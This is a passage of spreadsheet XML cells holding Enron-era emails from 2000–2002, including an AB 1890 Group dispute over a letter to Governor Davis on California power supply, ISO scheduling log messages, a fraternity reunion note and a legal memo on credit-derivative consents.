&gt; 20. Happy Birthday, Uncle Dad!! ......(available only in Tenn.)_x000D_
&gt; _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 13:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/20/01; HourAhead hour: 21;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>Start Date: 4/20/01; HourAhead hour: 21;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042021.txt</t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 04:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'braun@cmua.org'})</t>
  </si>
  <si>
    <t>frozenset({'jordan@cmua.org', 'egarcia@ka-pow.com', 'memcdonald@calpx.com', 'dominic.dimare@calchamber.com', 'jwright@smithandkempton.com', 'brownc@epenergy.com', 'joseph.lyons@asm.ca.gov', 'rlarson@caiso.com', 'scarter@nrdc.org', 'kevin.lynch@pacificorp.com', 'tschmelz@energy.state.ca.us', 'joer@calpine.com', 'gordon.mcdonald@pacificorp.com', 'jim@resources.ca.gov', 'anw@cpuc.ca.gov', 'wbooth@booth-law.com', 'jalamo@enron.com', 'jackson_gualco@gualcogroup.com', 'mikahl@ka-pow.com', 'bzobel@mail.arco.com', 'pikes@epenergy.com', 'smara@enron.com', 'rcavanagh@nrdc.org', 'smutny@iepa.com', 'kedson@ns.net', 'kevins@ncpa.com', 'klc@aelaw.com', 'sreeder@sppc.com', 'pstohr@dbsr.com', 'athomas@newenergy.com', 'dsam@chevron.com', 'wkeese@energy.state.ca.us', 'debinorton@aol.com', 'mmasri@energy.state.ca.us', 'kgrosulak@sppc.com', 'jackflanigan@flaniganlaw.com', 'dhunter@smithandkempton.com', 'kjarrell@smurfit.com', 'phil.nails@asm.ca.gov', 'twinter@caiso.com', 'drothrock@cmta.net', 'rick.counihan@greenmountain.com', 'jgl@cpuc.ca.gov', 'alippin@mail.arco.com', 'johnf@ncpa.com', 'dcazalet@apx.com', 'mpa@aelaw.com', 'mpetroch@enron.com', 'cmcintyre@sempra.com', 'pcaceo@pacbell.net', 'szablyal@epenergy.com', 'kmccrea@sablaw.com', 'moravekj@sce.com', 'ray.thompson@sen.ca.gov', 'jstewart@cmta.net', 'katherinebrandenburg@flaniganlaw.com', 'berry@apx.com', 'swilson@cmua.org', 'houstgrp@pacbell.net', 'mdjoseph@adamsbroadwell.com', 'schaefvl@sce.com', 'cohnap@sce.com', 'kykoyano@calpx.com', 'jdasovic@enron.com', 'tdinkel@retx.com', 'eke@aelaw.com', 'braun@cmua.org', 'jcassie@sempra.com', 'john.rozsa@sen.ca.gov', 'lga@mother.com', 'bakilbourne@calpx.com', 'randy.chinn@sen.ca.gov', 'charles.bacchi@asm.ca.gov', 'gronijn@texaco.com', 'fosterrg@sce.com', 'brbarkovich@earthlink.net', 'hacknece@sce.com', 'fieldejr@sce.com', 'vjw@cleanpower.org', 'cra@calretailers.com', 'bridgesj@epenergy.com', 'priced@epenergy.com', 'gheath@eob.ca.gov', 'rosst@sce.com', 'karen@klindh.com', 'dcarroll@dbsr.com', 'ed@clfp.com', 'anna.ferrera@sen.ca.gov', 'carolyn.veal-hunter@asm.ca.gov', 'lawrence.lingbloom@sen.ca.gov', 'mflorio@turn.org', 'kmills@cfbf.com'})</t>
  </si>
  <si>
    <t>RE: IMPORTANT -- Letter to Governor Davis</t>
  </si>
  <si>
    <t>AB 1890 Group:_x000D_
_x000D_
A response to the ISO's recent message regarding CMUA's proposed language is_x000D_
necessary._x000D_
_x000D_
First, CMUA proposed its language to the Group on participation of municipal_x000D_
System Units during the week of August 21st, and discussed the matter at_x000D_
length with the Group when ISO representatives were in attendance and_x000D_
commenting on various drafting suggestions. Any implication that there is an_x000D_
element of surprise associated with the CMUA language is unfounded.  If_x000D_
anything, it is the ISO's latest suggestion to remove the language that is_x000D_
tardy.  The Letter underwent several iterative changes, during which time_x000D_
the ISO had an opportunity to make constructive suggestions to modify the_x000D_
language (preferably), or at a minimum explain its position so that the_x000D_
Group could consider the issue._x000D_
_x000D_
Second, the ISO indicates that "there is ongoing and longstanding litigation_x000D_
over how to bring MUNIs into the ISO system," as a reason for not including_x000D_
the language in the proposed Letter.  Certainly, the fact that an issue is_x000D_
being litigated is not a distinguishing characteristic.  What issue hasn't_x000D_
been litigated, including Load participation in ISO Ancillary Service_x000D_
markets?! As we fully discussed with the Group, there are a host of issues_x000D_
associated with municipal/ISO discussions, including ISO cost allocation to_x000D_
Load.  CMUA's specific proposal is to uncouple issues of transmission and_x000D_
Load cost allocation from the issue of getting generation capacity into the_x000D_
markets.  It is unfortunate that, when we all recognize that we need more_x000D_
capacity in the ISO markets to deepen supply, the ISO is taking a position_x000D_
to hold on to "chits" in an effort to strengthen its hand on transmission_x000D_
and Load cost allocation issues.  The end result is that generation is not_x000D_
in the ISO markets (whatever the exact number, it is far in excess of_x000D_
several of the other recommendations made in the letter) because the issue_x000D_
is being held hostage for negotiating purposes on issues that have nothing_x000D_
to do with supply._x000D_
_x000D_
At this point, it appears we will not have agreement on this matter.  In the_x000D_
past, the Group has acted as a consensus organization.  CMUA would like the_x000D_
group to consider how the letter is characterized to the Governor, or anyone_x000D_
else, if one or more members have remaining concerns._x000D_
_x000D_
Tony Braun_x000D_
Braun &amp; Associates, P.C._x000D_
915 L Street_x000D_
Suite 1460_x000D_
Sacramento, California 95814_x000D_
(916) 441-1733_x000D_
(916) 441-4053 (facsimile)_x000D_
braun@braunlegal.com_x000D_
_x000D_
Counsel to CMUA_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Larson, Robin [mailto:RLarson@caiso.com]_x000D_
Sent: Monday, September 18, 2000 10:42 AM_x000D_
To: 'Karen Edson'; dhunter@smithandkempton.com; 'Aaron Thomas (E-mail)';_x000D_
'Allan Lippincott'; 'Ann Cohn (E-mail)'; 'Ann Watson'; 'Anna Ferrera_x000D_
(E-mail)'; 'Art Carter'; 'assistant for John Fielder'; Barkovich,_x000D_
Barbara; Kilbourne, Becky; 'Bill Booth (E-mail)'; 'Bill Dombrowski';_x000D_
'Bill Keese (E-mail)'; 'Bill Zobel (E-mail)'; 'Bob Foster'; 'Bob_x000D_
Houston'; 'Carolyn McIntyre (E-mail)'; 'Carolyn Veal-Hunter (E-mail)';_x000D_
'Catherine Hackney (E-mail)'; 'Charles Bacchi (E-mail)'; 'Craig Brown';_x000D_
'Dan Carroll (E-mail)'; Cazalet, Denise; 'Dennis Price (E-mail)'; 'Denny_x000D_
Samuel'; 'Dominic DiMare'; 'Dorothy Rothrock (E-mail)'; 'Ed Yates';_x000D_
'Eloy Garcia (E-mail)'; Elsesser, Evelyn; Heath, Gary; 'Gordon_x000D_
McDonald'; 'Jack Flanigan'; 'Jack Gualco (E-mail)'; 'Jack Stewart';_x000D_
'James Boyd'; 'Jan Smutny-Jones (E-mail)'; 'Jeff Dasovich (E-mail)';_x000D_
Jordan, Jerry; 'Jim Cassie (E-mail)'; 'Jim Groniger (E-mail)'; 'Joe_x000D_
Lyons (E-mail)'; Ronan, Joe; 'John Bridges (E-mail)'; 'John Fielder';_x000D_
'John Fistolera (E-mail)'; 'John Larrea (E-mail)'; 'John Rozsa_x000D_
(E-mail)'; 'John White (E-mail)'; 'Joseph Alamo'; 'Julia Wright'; 'Karen_x000D_
Jarrell (E-mail)'; Koyano, Karen; Lindh, Karen; 'Karen Mills (E-mail)';_x000D_
'Kari Harteloo'; 'Kathy Brandenburg'; 'Kay Grosulak (E-mail)'; 'Keith_x000D_
McCrea (E-mail)'; 'Kevin Lynch (E-mail)'; Smith, Kevin; 'Lawrence_x000D_
Lingbloom (E-mail)'; 'Lenny Goldberg (E-mail)'; 'Louis Szablya_x000D_
(E-mail)'; 'Marc Joseph (E-mail)'; 'Marwan Masri (E-mail)'; 'Mary_x000D_
McDonald (E-mail)'; Alcantar, Michael; Florio, Mike; 'Mike Kahl'; 'Mona_x000D_
Petrochko (E-mail)'; 'Pete Conaty (E-mail)'; 'Phil Nails'; 'Phil Stohr_x000D_
(E-mail)'; 'Ralph Cavanagh (E-mail)'; 'Randy Chinn (E-mail)'; 'Ray_x000D_
Thompson (E-mail)'; 'Rick Counihan'; Berry, Robert; Larson, Robin;_x000D_
'Sheryl Carter (E-mail)'; 'Steve Pike (E-mail)'; 'Stu Wilson (E-mail)';_x000D_
Mara, Sue; 'Susan Reeder (E-mail)'; Winter, Terry; Dinkel, Tom; 'Tim_x000D_
Schmelzer (E-mail)'; 'Tommy Ross'; 'Tony Braun'; 'Victoria Schaefer_x000D_
(E-mail)'_x000D_
Cc: Winter, Terry_x000D_
Subject: RE: IMPORTANT -- Letter to Governor Davis_x000D_
_x000D_
_x000D_
I do not have a comment on Karen's edit, but I wanted to email the entire_x000D_
group about CMUA's insistence on keeping Proposal 8 under the generation_x000D_
section. (This is the section referencing potential MUNI units that could be_x000D_
bid into the ISO A/S market if we can figure out a way to avoid having them_x000D_
join formally). I had mentioned when this was first brought up--which was_x000D_
frankly rather late in the drafting game--that I thought this would be very_x000D_
controversial at ISO. Not only does ISO not concur with the notion that_x000D_
there would be "over 1000 MW of addiitonal supply into A/S markets" but_x000D_
placing this language in a letter to the Governor makes it look like ISO is_x000D_
the obstacle to having these units available.  There is ongoing and_x000D_
longstanding litigation over how to bring MUNIs into the ISO system.  I am_x000D_
not uncomfortable with discussing this issue at any AB 1890 meeting, but_x000D_
forcing the issue in this Governor's letter is not placing the issue on a_x000D_
level playing field in my opinion._x000D_
_x000D_
If CMUA decides not to sign the letter without this controversial piece that_x000D_
will be unfortunate._x000D_
_x000D_
-----Original Message-----_x000D_
From: Karen Edson [mailto:kedson@ns.net]_x000D_
Sent: Thursday, September 14, 2000 1:19 PM_x000D_
To: dhunter@smithandkempton.com; 'Aaron Thomas (E-mail)'; 'Allan_x000D_
Lippincott'; 'Ann Cohn (E-mail)'; 'Ann Watson'; 'Anna Ferrera (E-mail)';_x000D_
'Art Carter'; 'assistant for John Fielder'; 'Barbara Barkovich_x000D_
(E-mail)'; 'Becky Kilbourne'; 'Bill Booth (E-mail)'; 'Bill Dombrowski';_x000D_
'Bill Keese (E-mail)'; 'Bill Zobel (E-mail)'; 'Bob Foster'; 'Bob_x000D_
Houston'; 'Carolyn McIntyre (E-mail)'; 'Carolyn Veal-Hunter (E-mail)';_x000D_
'Catherine Hackney (E-mail)'; 'Charles Bacchi (E-mail)'; 'Craig Brown';_x000D_
'Dan Carroll (E-mail)'; 'Denice Cazalet'; 'Dennis Price (E-mail)';_x000D_
'Denny Samuel'; 'Dominic DiMare'; 'Dorothy Rothrock (E-mail)'; 'Ed_x000D_
Yates'; 'Eloy Garcia (E-mail)'; 'Evelyn Elsesser (E-mail)'; 'Gary Heath_x000D_
(E-mail)'; 'Gordon McDonald'; 'Jack Flanigan'; 'Jack Gualco (E-mail)';_x000D_
'Jack Stewart'; 'James Boyd'; 'Jan Smutny-Jones (E-mail)'; 'Jeff_x000D_
Dasovich (E-mail)'; 'Jerry Jordan'; 'Jim Cassie (E-mail)'; 'Jim Groniger_x000D_
(E-mail)'; 'Joe Lyons (E-mail)'; 'Joe Ronan'; 'John Bridges (E-mail)';_x000D_
'John Fielder'; 'John Fistolera (E-mail)'; 'John Larrea (E-mail)'; 'John_x000D_
Rozsa (E-mail)'; 'John White (E-mail)'; 'Joseph Alamo'; 'Julia Wright';_x000D_
'Karen Jarrell (E-mail)'; 'Karen Koyano (E-mail)'; 'Karen Lindh'; 'Karen_x000D_
Mills (E-mail)'; 'Kari Harteloo'; 'Kathy Brandenburg'; 'Kay Grosulak_x000D_
(E-mail)'; 'Keith McCrea (E-mail)'; 'Kevin Lynch (E-mail)'; 'Kevin Smith_x000D_
(E-mail)'; 'Lawrence Lingbloom (E-mail)'; 'Lenny Goldberg (E-mail)';_x000D_
'Louis Szablya (E-mail)'; 'Marc Joseph (E-mail)'; 'Marwan Masri_x000D_
(E-mail)'; 'Mary McDonald (E-mail)'; 'Michael Alcantar (E-mail)'; 'Mike_x000D_
Florio (E-mail)'; 'Mike Kahl'; 'Mona Petrochko (E-mail)'; 'Pete Conaty_x000D_
(E-mail)'; 'Phil Nails'; 'Phil Stohr (E-mail)'; 'Ralph Cavanagh_x000D_
(E-mail)'; 'Randy Chinn (E-mail)'; 'Ray Thompson (E-mail)'; 'Rick_x000D_
Counihan'; 'Robert Berry (E-mail)'; 'Robin Larson (E-mail)'; 'Sheryl_x000D_
Carter (E-mail)'; 'Steve Pike (E-mail)'; 'Stu Wilson (E-mail)'; 'Sue_x000D_
Mara'; 'Susan Reeder (E-mail)'; 'Terry Winter (E-mail)'; 'Thomas Dinkel_x000D_
(E-mail)'; 'Tim Schmelzer (E-mail)'; 'Tommy Ross'; 'Tony Braun';_x000D_
'Victoria Schaefer (E-mail)'_x000D_
Subject: RE: IMPORTANT -- Letter to Governor Davis_x000D_
_x000D_
_x000D_
_x000D_
Delaney -_x000D_
_x000D_
IEP has one minor edit to the draft letter and three edits to the_x000D_
recommendations.  Three of our four suggestions are driven by legislation_x000D_
sent to the Governor in the last days of session.  A redlined version is_x000D_
attached.  I hope this is helpful._x000D_
_x000D_
(1) We propose to eliminate one proposed solution that is part of AB_x000D_
970._x000D_
Our edits move to the description of AB 970 the recommendation for allowing_x000D_
plants expected to come on line in 2 or 3 years to come on line earlier as_x000D_
single cycle facilities from the list of solutions._x000D_
_x000D_
(2) We propose to move the proposal to expedite renewable generation to_x000D_
a_x000D_
comment that signing AB 995/SB 1194 will expedite more than 500 MW of new_x000D_
renewable generation by next summer.  (This number is based on a CEC_x000D_
letter.)_x000D_
_x000D_
(3) We propose to consolidate solutions 4 and 5 since both involve_x000D_
changes_x000D_
or additions to existing plants._x000D_
_x000D_
(4) Finally, we propose to modify the description of the CEC's expedited_x000D_
siting process to reflect AB 970 more accurately._x000D_
_x000D_
If you have any questions, please call._x000D_
_x000D_
Karen Edson_x000D_
kedson@ns.net_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Delaney Hunter [mailto:dhunter@smithandkempton.com]_x000D_
Sent: Tuesday, September 12, 2000 5:03 PM_x000D_
To: Aaron Thomas (E-mail); 'Allan Lippincott'; Ann Cohn (E-mail); 'Ann_x000D_
Watson'; Anna Ferrera (E-mail); 'Art Carter'; 'assistant for John_x000D_
Fielder'; Barbara Barkovich (E-mail); 'Becky Kilbourne'; Bill Booth_x000D_
(E-mail); 'Bill Dombrowski'; Bill Keese (E-mail); Bill Zobel (E-mail);_x000D_
'Bob Foster'; 'Bob Houston'; Carolyn McIntyre (E-mail); Carolyn_x000D_
Veal-Hunter (E-mail); Catherine Hackney (E-mail); Charles Bacchi_x000D_
(E-mail); 'Craig Brown'; Dan Carroll (E-mail); 'Denice Cazalet'; Dennis_x000D_
Price (E-mail); 'Denny Samuel'; 'Dominic DiMare'; Dorothy Rothrock_x000D_
(E-mail); 'Ed Yates'; Eloy Garcia (E-mail); Evelyn Elsesser (E-mail);_x000D_
Gary Heath (E-mail); 'Gordon McDonald'; 'Jack Flanigan'; Jack Gualco_x000D_
(E-mail); 'Jack Stewart'; 'James Boyd'; Jan Smutny-Jones (E-mail); Jeff_x000D_
Dasovich (E-mail); 'Jerry Jordan'; Jim Cassie (E-mail); Jim Groniger_x000D_
(E-mail); Joe Lyons (E-mail); 'Joe Ronan'; John Bridges (E-mail); 'John_x000D_
Fielder'; John Fistolera (E-mail); John Larrea (E-mail); John Rozsa_x000D_
(E-mail); John White (E-mail); 'Joseph Alamo'; 'Julia Wright'; Karen_x000D_
Edson (E-mail); Karen Jarrell (E-mail); Karen Koyano (E-mail); 'Karen_x000D_
Lindh'; Karen Mills (E-mail); 'Kari Harteloo'; 'Kathy Brandenburg'; Kay_x000D_
Grosulak (E-mail); Keith McCrea (E-mail); Kevin Lynch (E-mail); Kevin_x000D_
Smith (E-mail); Lawrence Lingbloom (E-mail); Lenny Goldberg (E-mail);_x000D_
Louis Szablya (E-mail); Marc Joseph (E-mail); Marwan Masri (E-mail);_x000D_
Mary McDonald (E-mail); Michael Alcantar (E-mail); Mike Florio (E-mail);_x000D_
'Mike Kahl'; Mona Petrochko (E-mail); Pete Conaty (E-mail); 'Phil_x000D_
Nails'; Phil Stohr (E-mail); Ralph Cavanagh (E-mail); Randy Chinn_x000D_
(E-mail); Ray Thompson (E-mail); 'Rick Counihan'; Robert Berry (E-mail);_x000D_
Robin Larson (E-mail); Sheryl Carter (E-mail); Steve Pike (E-mail); Stu_x000D_
Wilson (E-mail); 'Sue Mara'; Susan Reeder (E-mail); Terry Winter_x000D_
(E-mail); Thomas Dinkel (E-mail); Tim Schmelzer (E-mail); 'Tommy Ross';_x000D_
'Tony Braun'; Victoria Schaefer (E-mail)_x000D_
Subject: IMPORTANT -- Letter to Governor Davis_x000D_
_x000D_
_x000D_
Folks-_x000D_
At today's meeting, those Group members who attended agreed that we should_x000D_
indeed send the letter with changes reflecting the new legislation. Attached_x000D_
is the newest draft of such a letter. We need to send this letter out FRIDAY_x000D_
so in order to do that please look over the letter carefully and let me know_x000D_
if your organization wishes to be included as a signatory. I need every set_x000D_
of eyes out there to look this letter over for spelling, grammar and_x000D_
content -- my eyes have seen it too many times and are apt to miss things._x000D_
So, here is the process ---_x000D_
_x000D_
Let me know of any minor changes ASAP. If there are content changes please_x000D_
email them to the ENTIRE group for sign off. Please understand that we want_x000D_
to send this FRIDAY so we do not have a lot of time to make changes. When I_x000D_
have a final draft I will ask people to fax signatures or send originals to_x000D_
me by Friday.Thank you all for your help with this letter. We could not have_x000D_
done it with out you._x000D_
_x000D_
We will be scheduling our next general meeting for mid October. Also, we_x000D_
have finalized the dates for the Annual Retreat and will be sending out_x000D_
packets with all the details next week. DJ and I are working on the agenda_x000D_
so if you have a specific topic you would like covered please let us know._x000D_
As always, please send me an email or give me a call if you have any_x000D_
concerns or questions about the letter or any other matter._x000D_
_x000D_
Thanks,_x000D_
Delaney</t>
  </si>
  <si>
    <t>Mon, 4 Feb 2002 19:56:48 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 2/4/02; HourAhead hour: 22;  HourAhead schedule download failed. Manual intervention required.</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 08:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rharman@bass-associates.com'})</t>
  </si>
  <si>
    <t>frozenset({'boardwalk@iquest.net', 'kstewart@ctcua.org', 'pastorhess@hotmail.com', 'jawallace12050@aol.com', 'mbaddour@msn.com', 'williamhjordan@mindspring.com', 'bensons3@airmail.net', 'pwm1950@aol.com', 'hbrunette@earthlink.net', 'wgander@twa.com', 'jglass@mmind.net', 'harris@wheelerads.com', 'bwall@copcp.com', 'crrackups@aol.com', 'hosman@eskridge.net', 'judgegyro@yahoo.com', 'chuck.paul@a-closer-look.com', 'jansson@mindspring.com', 'azaremba@fzci.net', 'dfullert@nmh.org', 'jowen9653@aol.com', 'akinpa@email.msn.com', 'golfnbud@aol.com', 'jdent@mmcable.com', 'jstorthz@flash.net', 'handshohl@eudoramail.com', 'hosman@flash.net', 'samuraimai@aol.com', 'hutchathoh@aol.com', 'john_grumbles@berryplastics.com', 'shackleton@worldnet.att.net', 'jepetree@bellsouth.net', 'jimfulrich@aol.com', 'rrossell@angiodynamics.com', 'kcason@flash.net', 'craigd9561@aol.com', 'jskilli@enron.com', 'sogborn@goiac.com', 'johnmiller@advlaser.com', 'michael_arends@putnaminv.com', 'boethia@hotmail.com', 'rharman@bass-associates.com', 'markpa@gateway.net', 'ccoburn@themissionbank.com', 'froby@holmesmurphy.com', 'leland.white@energyspectrum.com', 'christop@netcomuk.co.uk', 'fredinvt@juno.com'})</t>
  </si>
  <si>
    <t>RE: -kai-</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry to hear Rob can't make it.....have him send Lucinda!!!!!_x000D_
_x000D_
-----Original Message-----_x000D_
From: Fred D Haulenbeek [SMTP:fredinvt@juno.com]_x000D_
Sent: Monday, October 09, 2000 9:18 PM_x000D_
To: akinpa@email.msn.com; bwall@copcp.com; WilliamHJordan@mindspring.com;_x000D_
jansson@mindspring.com; judgegyro@yahoo.com; golfnbud@aol.com;_x000D_
chuck.paul@a-closer-look.com; handshohl@eudoramail.com; craigd9561@aol.com;_x000D_
christop@netcomuk.co.uk; ccoburn@themissionbank.com;_x000D_
shackleton@worldnet.att.net; boardwalk@iquest.net; dfullert@nmh.org;_x000D_
froby@holmesmurphy.com; wgander@twa.com; John_Grumbles@berryplastics.com;_x000D_
hbrunette@earthlink.net; harris@wheelerads.com; jdent@mmcable.com;_x000D_
pastorhess@hotmail.com; jglass@mmind.net; jepetree@bellsouth.net;_x000D_
jowen9653@aol.com; jskilli@enron.com; JAWallace12050@aol.com;_x000D_
jstorthz@flash.net; johnmiller@advlaser.com; KCason@flash.net;_x000D_
kstewart@ctcua.org; leland.white@energyspectrum.com; markpa@gateway.net;_x000D_
Michael_Arends@putnaminv.com; Mbaddour@msn.com; hutchathoh@aol.com; crra_x000D_
ckups@aol.com; samuraimai@aol.com; JimFUlrich@aol.com; sogborn@goiac.com;_x000D_
hosman@flash.net; RHarman@Bass-Associates.com; Bensons3@airmail.net;_x000D_
pwm1950@aol.com; boethia@hotmail.com; AZaremba@FZCI.net;_x000D_
rrossell@angiodynamics.com; hosman@eskridge.net_x000D_
Subject: -kai-_x000D_
_x000D_
Beta Thursday Night Gang,_x000D_
_x000D_
Significant progress has been made in our quest to locate an alternate_x000D_
venue for our Thursday night rendezvous._x000D_
_x000D_
The suggestion actually came from Queensbury, NY of all places.  Yes,_x000D_
brother Rob Rossell ('77) has volunteered his brother Bill's_x000D_
establishment....Lakewood Landing.  Tom Benson says it's near Stan's Blue_x000D_
Note Inn._x000D_
_x000D_
A brief description, details and directions will follow._x000D_
_x000D_
I spoke to Mike Arends today...it looks like Mike will be joining us in_x000D_
spite of the fact that he will be at the alter 2 weeks later.  Rob_x000D_
Rossell tells me that Tim Strange is coming down with Harry Singleton._x000D_
The brothers just keep on coming out of the woodwork.  Rob Bugh got into_x000D_
the loop only recently- too late to make plans to leave the flock behind._x000D_
_x000D_
Though he's become a silver-gray, his hand keeps time and measure...check_x000D_
out Elvis doin' the hambone thing (attachment).  A Beta Top 40 included_x000D_
too! (don't worry Jansson, I still have my day job)_x000D_
_x000D_
-kai-_x000D_
BEEK &lt;&lt; File: ATT00000.html &gt;&gt;  &lt;&lt; File: Elvis.jpg &gt;&gt;  &lt;&lt; File:_x000D_
lovingcup3.wav &gt;&gt; </t>
  </si>
  <si>
    <t>Wed, 2 Aug 2000 11:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Jeff, we are thinking about how to finish the mid-market iniative and I need _x000D_
to know if you want Breslau.  I would like him in a singular role and _x000D_
accountability so I need to plan to incorporate him or not depending on if _x000D_
you want him._x000D_
_x000D_
Regards_x000D_
Delainey</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 12:47:51 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'postmaster@ftenergy.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Your message_x000D_
_x000D_
  To:      Dowjones1 (E-mail); Dowjones2 (E-mail); Gas Daily (E-mail);_x000D_
Iferc1 (E-mail); Iferc2 (E-mail); NGI (E-mail)_x000D_
  Sent:    Mon, 29 Oct 2001 14:50:54 -0600_x000D_
_x000D_
was delivered to the following recipient(s):_x000D_
_x000D_
Mailbox - Gas Daily on Mon, 29 Oct 2001 13:47:51 -0600_x000D_
    MSEXCH:MSExchangeMTA:HOUSTON:GAGE_x000D_
_x000D_
_x000D_
 - C.DTF </t>
  </si>
  <si>
    <t>Wed, 9 Jan 2002 14:24:07 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
RIGZONE DAILY NEWS -- THURSDAY, JANUARY 10, 2002_x000D_
------------------------------------------------------------_x000D_
Daily News from the worldwide upstream oil &amp; gas industry_x000D_
   to view the complete version, please go to: _x000D_
   http://www.rigzone.com/newsletter_show.asp?n_id=197_x000D_
------------------------------------------------------------</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 09:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nbutler@susmangodfrey.com'})</t>
  </si>
  <si>
    <t>FW: [tthv] Fwd: Fwd: Fwd: Check this out... TOO COOL!!!!!</t>
  </si>
  <si>
    <t>-----Original Message-----_x000D_
From: Jeff Watkins [mailto:jeffw@lashleyinc.com]_x000D_
Sent: Friday, April 06, 2001 4:01 PM_x000D_
To: DARRIN D DAY; Kurt Meinert; rob; Noel Butler_x000D_
Subject: FW: [tthv] Fwd: Fwd: Fwd: Check this out... TOO COOL!!!!!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kelli [mailto:kellim@lashleyinc.com]_x000D_
Sent: Friday, April 06, 2001 1:43 PM_x000D_
To: Steve Davidek; Stephanie; Kim; Jeff Watkins; Gloria Allen; DAD;_x000D_
Brandon Whitworth; Erica Williams; Clif Hutchins_x000D_
Subject: FW: [tthv] Fwd: Fwd: Fwd: Check this out... TOO COOL!!!!!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Matt Vuskov [mailto:matt@gmont.com]_x000D_
Sent: Friday, April 06, 2001 2:39 PM_x000D_
To: KELLI (E-mail)_x000D_
Subject: FW: [tthv] Fwd: Fwd: Fwd: Check this out... TOO COOL!!!!!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Viet Tran [mailto:viet@gmont.com]_x000D_
Sent: Friday, April 06, 2001 11:04 AM_x000D_
To: REBECCA (E-mail); MATT VUSKOV (E-mail)_x000D_
Subject: FW: [tthv] Fwd: Fwd: Fwd: Check this out... TOO COOL!!!!!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: anh n vo [mailto:Annievo@mailcity.com]_x000D_
Sent: Thursday, April 05, 2001 1:58 PM_x000D_
To: tthv@yahoogroups.com_x000D_
Subject: [tthv] Fwd: Fwd: Fwd: Check this out... TOO COOL!!!!!_x000D_
_x000D_
_x000D_
_x000D_
--_x000D_
_x000D_
--------- Forwarded Message ---------_x000D_
_x000D_
DATE: Wed, 04 Apr 2001 22:34:20_x000D_
From: "Hong Vo" &lt;hongvo@lycos.com&gt;_x000D_
To: annievo@mailcity.com_x000D_
_x000D_
_x000D_
--_x000D_
_x000D_
--------- Forwarded Message ---------_x000D_
_x000D_
DATE: Mon, 02 Apr 2001 07:55:48_x000D_
From: "Loan Tran" &lt;loanstar82@hotmail.com&gt;_x000D_
To: hongvo@lycos.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Get 250 color business cards for FREE! at Lycos Mail_x000D_
http://mail.lycos.com/freemail/vistaprint_index.html_x000D_
--------- End Forwarded Message ---------_x000D_
_x000D_
_x000D_
_x000D_
Get 250 color business cards for FREE! at Lycos Mail_x000D_
http://mail.lycos.com/freemail/vistaprint_index.html_x000D_
------------------------ Yahoo! Groups Sponsor ---------------------~-~&gt;_x000D_
Make good on the promise you made at graduation to keep_x000D_
in touch. Classmates.com has over 14 million registered_x000D_
high school alumni--chances are you'll find your friends!_x000D_
http://us.click.yahoo.com/03IJGA/DMUCAA/4ihDAA/p8RVlB/TM_x000D_
---------------------------------------------------------------------_-&gt;_x000D_
_x000D_
To unsubscribe from this group, send an email to:_x000D_
tthv-unsubscribe@yahoogroups.com_x000D_
_x000D_
_x000D_
_x000D_
Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/_x000D_
_x000D_
_x000D_
_x000D_
 - ATT00002.html_x000D_
 - ATT00005.html_x000D_
 - ATT00008.html_x000D_
 - ATT00011.html_x000D_
 - 11faces.jpg</t>
  </si>
  <si>
    <t>Wed, 19 Jan 2000 12:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.taylor@enron.com', 'bryan.seyfried@enron.com'})</t>
  </si>
  <si>
    <t>Re: Consent</t>
  </si>
  <si>
    <t xml:space="preserve">Mark/Bryan_x000D_
_x000D_
Based on our meeting with Sullivan &amp; Cromwell, a few points occur to me _x000D_
(these may well be in the "obvious" category!)_x000D_
_x000D_
we generally don't need to worry at all about non-energy reference credits, _x000D_
since we won't have any confidential info about them (this group will over _x000D_
time become the vast majority)_x000D_
there are (as I understand it) about 200 energy reference credits we are _x000D_
looking at and this class (unlike the non-energy credits) is unlikely to grow _x000D_
substantially_x000D_
of the 200 energy credits, a number should be definite "ins" (eg the high _x000D_
profile, big players with whom we don't have a special relationship) and a _x000D_
number will be "outs" (ie where the relationship is much too close to risk _x000D_
quoting on them) _x000D_
perhaps we could initially launch the product with the "ins" and, over time, _x000D_
add the residual category who get the all clear._x000D_
_x000D_
I agree that evaluating our relationships with individual reference entities _x000D_
may be tricky and time consuming.  Perhaps the best place to start might be _x000D_
with the business person who has overall responsibility for the relationship _x000D_
in question and should have a view on the nature of the relationship and _x000D_
whether we have any info about the entity which is sensitive.  It may well be _x000D_
that we have confidentiality agreements in place, but not much confidential _x000D_
info passing under them._x000D_
_x000D_
Grateful for any views on this._x000D_
_x000D_
Paul_x000D_
_x000D_
_x000D_
To: Bryan Seyfried/LON/ECT@ECT_x000D_
cc: Mark E Haedicke/HOU/ECT@ECT, Louise Kitchen/LON/ECT@ECT, Paul _x000D_
Simons/LON/ECT@ECT _x000D_
_x000D_
Subject: Re: Consent  _x000D_
